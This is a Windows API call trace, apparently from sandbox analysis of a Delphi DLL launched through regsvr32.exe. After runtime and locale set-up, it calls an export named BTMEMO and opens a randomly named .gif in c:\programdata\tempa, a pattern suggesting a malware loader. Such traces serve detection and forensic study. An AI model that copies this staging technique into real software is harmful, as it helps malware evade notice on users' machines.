[0085.918] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c0d0 | out: phkResult=0x12c0d0*=0x0) returned 0x2
[0085.918] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c0d0 | out: phkResult=0x12c0d0*=0x0) returned 0x2
[0085.918] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c0d0 | out: phkResult=0x12c0d0*=0x0) returned 0x2
[0085.918] GetUserDefaultUILanguage () returned 0x409
[0085.919] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1
[0085.919] GetThreadUILanguage () returned 0x120409
[0085.919] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12c0ac, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12c0d4 | out: pulNumLanguages=0x12c0ac, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12c0d4) returned 1
[0085.919] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12c0ac, pwszLanguagesBuffer=0x177a680, pcchLanguagesBuffer=0x12c0d4 | out: pulNumLanguages=0x12c0ac, pwszLanguagesBuffer=0x177a680, pcchLanguagesBuffer=0x12c0d4) returned 1
[0085.919] FindFirstFileW (in: lpFileName="c:\\programdata\\tempa\\marxvxinhhm98.en-US", lpFindFileData=0x12be7c | out: lpFindFileData=0x12be7c) returned 0xffffffff
[0085.919] FindFirstFileW (in: lpFileName="c:\\programdata\\tempa\\marxvxinhhm98.en", lpFindFileData=0x12be7c | out: lpFindFileData=0x12be7c) returned 0xffffffff
[0085.920] GetUserDefaultUILanguage () returned 0x409
[0085.920] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12c0f0, cchData=4 | out: lpLCData="ENU") returned 4
[0085.920] FindFirstFileW (in: lpFileName="c:\\programdata\\tempa\\marxvxinhhm98.ENU", lpFindFileData=0x12be7c | out: lpFindFileData=0x12be7c) returned 0xffffffff
[0085.920] FindFirstFileW (in: lpFileName="c:\\programdata\\tempa\\marxvxinhhm98.EN", lpFindFileData=0x12be7c | out: lpFindFileData=0x12be7c) returned 0xffffffff
[0085.920] LoadStringW (in: hInstance=0x830000, uID=0xffcd, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20
[0085.920] LoadStringW (in: hInstance=0x830000, uID=0xffcc, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17
[0085.920] LoadStringW (in: hInstance=0x830000, uID=0xffcb, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28
[0085.920] LoadStringW (in: hInstance=0x830000, uID=0xffca, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15
[0085.920] LoadStringW (in: hInstance=0x830000, uID=0xffc9, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0085.920] LoadStringW (in: hInstance=0x830000, uID=0xffc8, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17
[0085.920] LoadStringW (in: hInstance=0x830000, uID=0xffc6, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15
[0085.920] LoadStringW (in: hInstance=0x830000, uID=0xffc7, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10
[0085.920] LoadStringW (in: hInstance=0x830000, uID=0xffd5, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0085.920] LoadStringW (in: hInstance=0x830000, uID=0xffc2, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10
[0085.920] LoadStringW (in: hInstance=0x830000, uID=0xffd4, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffef, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffd8, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffd7, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffe7, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffe8, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffe9, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffe6, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffe4, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffe2, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffe1, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffe0, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffff, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xfffe, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xfffd, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xfffc, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xfff5, lpBuffer=0x12c594, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd
[0085.921] LoadStringW (in: hInstance=0x830000, uID=0xffe3, lpBuffer=0x12c594, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0085.921] GetVersionExW (in: lpVersionInformation=0x12e4a8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12e4a8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0085.921] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75370000
[0085.922] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3392f8
[0085.922] GetProcAddress (hModule=0x75370000, lpProcName="GetNativeSystemInfo") returned 0x753abe77
[0085.922] GetNativeSystemInfo (in: lpSystemInfo=0x12e484 | out: lpSystemInfo=0x12e484*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0085.922] LoadStringW (in: hInstance=0x830000, uID=0xff5c, lpBuffer=0x12c46c, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7
[0085.922] LoadStringW (in: hInstance=0x830000, uID=0xff5f, lpBuffer=0x12c46c, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9
[0085.922] LoadStringW (in: hInstance=0x830000, uID=0xfffb, lpBuffer=0x12c58c, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15
[0085.922] LoadStringW (in: hInstance=0x830000, uID=0xfffa, lpBuffer=0x12c58c, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9
[0085.922] LoadStringW (in: hInstance=0x830000, uID=0xfff9, lpBuffer=0x12c58c, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17
[0085.922] LoadStringW (in: hInstance=0x830000, uID=0xfff8, lpBuffer=0x12c58c, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12
[0085.922] LoadStringW (in: hInstance=0x830000, uID=0xfff7, lpBuffer=0x12c58c, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13
[0085.922] LoadStringW (in: hInstance=0x830000, uID=0xff8d, lpBuffer=0x12c58c, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16
[0085.922] LoadStringW (in: hInstance=0x830000, uID=0xff6d, lpBuffer=0x12c58c, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20
[0085.922] GetVersionExW (in: lpVersionInformation=0x12e49c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12e49c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0085.923] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.923] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0085.923] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x17480dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19
[0085.923] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExW") returned 0x753ade40
[0085.923] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12e372, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0085.923] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e580 | out: phkResult=0x12e580*=0x0) returned 0x2
[0085.923] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e580 | out: phkResult=0x12e580*=0x0) returned 0x2
[0085.923] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e580 | out: phkResult=0x12e580*=0x0) returned 0x2
[0085.923] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e580 | out: phkResult=0x12e580*=0x0) returned 0x2
[0085.923] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e580 | out: phkResult=0x12e580*=0x0) returned 0x2
[0085.923] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e580 | out: phkResult=0x12e580*=0x0) returned 0x2
[0085.923] GetThreadLocale () returned 0x409
[0085.923] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12e4b8 | out: lpCPInfo=0x12e4b8) returned 1
[0085.923] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0085.923] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.923] GetProcAddress (hModule=0x75370000, lpProcName="GetLogicalProcessorInformation") returned 0x753a2004
[0085.923] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75370000
[0085.924] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x339308
[0085.924] GetProcAddress (hModule=0x75370000, lpProcName="GetLogicalProcessorInformation") returned 0x753a2004
[0085.924] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12e410 | out: Buffer=0x0, ReturnedLength=0x12e410) returned 0
[0085.924] GetLastError () returned 0x7a
[0085.924] GetLogicalProcessorInformation (in: Buffer=0x17399d0, ReturnedLength=0x12e410 | out: Buffer=0x17399d0, ReturnedLength=0x12e410) returned 1
[0085.924] GetCurrentThreadId () returned 0xf1c
[0085.924] GetCurrentThreadId () returned 0xf1c
[0085.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12e220, cchData=256 | out: lpLCData="2") returned 2
[0085.924] GetThreadLocale () returned 0x409
[0085.924] EnumCalendarInfoW (lpCalInfoEnumProc=0x8557f0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1
[0085.924] GetThreadLocale () returned 0x409
[0085.924] EnumCalendarInfoW (lpCalInfoEnumProc=0x855894, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1
[0085.925] GetCurrentThreadId () returned 0xf1c
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Sun") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Sunday") returned 7
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Mon") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Monday") returned 7
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Tue") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Wed") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Thu") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Thursday") returned 9
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Fri") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Friday") returned 7
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Sat") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12e21c, cchData=256 | out: lpLCData="Saturday") returned 9
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12e220, cchData=256 | out: lpLCData="Jan") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12e220, cchData=256 | out: lpLCData="January") returned 8
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12e220, cchData=256 | out: lpLCData="Feb") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12e220, cchData=256 | out: lpLCData="February") returned 9
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12e220, cchData=256 | out: lpLCData="Mar") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12e220, cchData=256 | out: lpLCData="March") returned 6
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12e220, cchData=256 | out: lpLCData="Apr") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12e220, cchData=256 | out: lpLCData="April") returned 6
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12e220, cchData=256 | out: lpLCData="May") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12e220, cchData=256 | out: lpLCData="May") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12e220, cchData=256 | out: lpLCData="Jun") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12e220, cchData=256 | out: lpLCData="June") returned 5
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12e220, cchData=256 | out: lpLCData="Jul") returned 4
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12e220, cchData=256 | out: lpLCData="July") returned 5
[0085.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12e220, cchData=256 | out: lpLCData="Aug") returned 4
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12e220, cchData=256 | out: lpLCData="August") returned 7
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12e220, cchData=256 | out: lpLCData="Sep") returned 4
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12e220, cchData=256 | out: lpLCData="September") returned 10
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12e220, cchData=256 | out: lpLCData="Oct") returned 4
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12e220, cchData=256 | out: lpLCData="October") returned 8
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12e220, cchData=256 | out: lpLCData="Nov") returned 4
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12e220, cchData=256 | out: lpLCData="November") returned 9
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12e220, cchData=256 | out: lpLCData="Dec") returned 4
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12e220, cchData=256 | out: lpLCData="December") returned 9
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12e270, cchData=256 | out: lpLCData="$") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12e270, cchData=256 | out: lpLCData="0") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12e270, cchData=256 | out: lpLCData="0") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12e468, cchData=2 | out: lpLCData=",") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12e468, cchData=2 | out: lpLCData=".") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12e270, cchData=256 | out: lpLCData="2") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12e468, cchData=2 | out: lpLCData="/") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12e228, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12e228, cchData=256 | out: lpLCData="1") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12e228, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12e228, cchData=256 | out: lpLCData="1") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12e468, cchData=2 | out: lpLCData=":") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12e270, cchData=256 | out: lpLCData="AM") returned 3
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12e270, cchData=256 | out: lpLCData="PM") returned 3
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12e270, cchData=256 | out: lpLCData="0") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12e270, cchData=256 | out: lpLCData="0") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12e270, cchData=256 | out: lpLCData="0") returned 2
[0085.926] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12e468, cchData=2 | out: lpLCData=",") returned 2
[0085.927] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x758f0000
[0085.927] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0085.927] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0085.927] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0085.927] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0085.927] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0085.927] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0085.927] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0085.927] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0085.927] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0085.927] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0085.928] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0085.928] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0085.928] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0085.928] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0085.928] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0085.928] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0085.928] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0085.928] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0085.928] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0085.928] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0085.928] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0085.929] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0085.929] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xcc
[0085.929] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xd0
[0085.929] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd4
[0085.929] LoadStringW (in: hInstance=0x830000, uID=0xff32, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Invalid time Offset string: %s") returned 0x1e
[0085.929] LoadStringW (in: hInstance=0x830000, uID=0xff31, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Invalid time string: %s") returned 0x17
[0085.929] LoadStringW (in: hInstance=0x830000, uID=0xff30, lpBuffer=0x12c59c, cchBufferMax=4096 | out: lpBuffer="Invalid date string: %s") returned 0x17
[0085.929] GetDC (hWnd=0x0) returned 0x2b010799
[0085.929] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0085.929] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0085.929] GetDC (hWnd=0x0) returned 0x2b010799
[0085.929] GetDeviceCaps (hdc=0x2b010799, index=104) returned 0
[0085.929] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0085.929] CreatePalette (plpal=0x12e1a8) returned 0x8080719
[0085.929] GetStockObject (i=7) returned 0x1b00017
[0085.930] GetStockObject (i=5) returned 0x1900015
[0085.930] GetStockObject (i=13) returned 0x18a002e
[0085.930] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0085.930] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0085.930] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e488 | out: phkResult=0x12e488*=0xd8) returned 0x0
[0085.930] RegQueryValueExW (in: hKey=0xd8, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x12e45c, lpData=0x0, lpcbData=0x12e474*=0x0 | out: lpType=0x12e45c*=0x1, lpData=0x0, lpcbData=0x12e474*=0xe) returned 0x0
[0085.930] RegQueryValueExW (in: hKey=0xd8, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x12e470, lpData=0x173288c, lpcbData=0x12e480*=0xe | out: lpType=0x12e470*=0x1, lpData="Tahoma", lpcbData=0x12e480*=0xe) returned 0x0
[0085.930] RegCloseKey (hKey=0xd8) returned 0x0
[0085.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tahoma", cchWideChar=6, lpMultiByteStr=0x12e4b5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tahoma", lpUsedDefaultChar=0x0) returned 6
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.930] GetCurrentThreadId () returned 0xf1c
[0085.931] GetCurrentThreadId () returned 0xf1c
[0085.931] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="BTMEMO", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0085.931] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="BTMEMO", cchWideChar=6, lpMultiByteStr=0x7d9d24, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTMEMO", lpUsedDefaultChar=0x0) returned 6
[0085.931] GetProcAddress (hModule=0x830000, lpProcName="BTMEMO") returned 0x917bf0
[0085.931] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c:\\programdata\\tempa\\marxvxinhhmxa.gif", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38
[0085.931] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c:\\programdata\\tempa\\marxvxinhhmxa.gif", cchWideChar=38, lpMultiByteStr=0x821c94, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\programdata\\tempa\\marxvxinhhmxa.gif", lpUsedDefaultChar=0x0) returned 38
[0085.931] _lopen (lpPathName="c:\\programdata\\tempa\\marxvxinhhmxa.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmxa.gif"), iReadWrite=0) returned 0xd8
